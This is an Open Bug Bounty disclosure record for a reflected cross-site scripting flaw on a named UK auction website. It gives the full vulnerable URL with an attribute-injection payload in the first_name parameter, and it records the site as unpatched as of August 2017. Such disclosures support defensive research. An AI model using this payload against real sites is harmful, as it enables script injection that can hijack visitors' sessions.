forumauctions.co.uk XSS vulnerability

2017-05-24T13:28:00
ID OBB:240708
Type openbugbounty
Reporter M0r3h4x
Modified 2017-08-16T14:16:00

Description

Vulnerable URL:
https://www.forumauctions.co.uk/Fine-Books-and-Works-on-Paper/25-01-2017?Itemid=0&auction;_date=&catId;=!_keyword=&first;_name=xss%22%20onfocus=prompt(/OPENBUGBOUNTY/)%20autofocus=%22&gridtype;=listview&high;_estimate=&ipp;=10&keyword;=&last;_name=&lot;_detail_id=29232&low;_estimate=&name;=&page;_no=1&sort;_by=lot_no&title;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 16.08.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1090871
VIP website status:| No
Check forumauctions.co.uk SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 May, 2017 13:28 GMT
Generic security notifications sent to website owner| 27 May, 2017 04:26 GMT
Vulnerability details disclosed by researcher| 16 August, 2017 14:16 GMT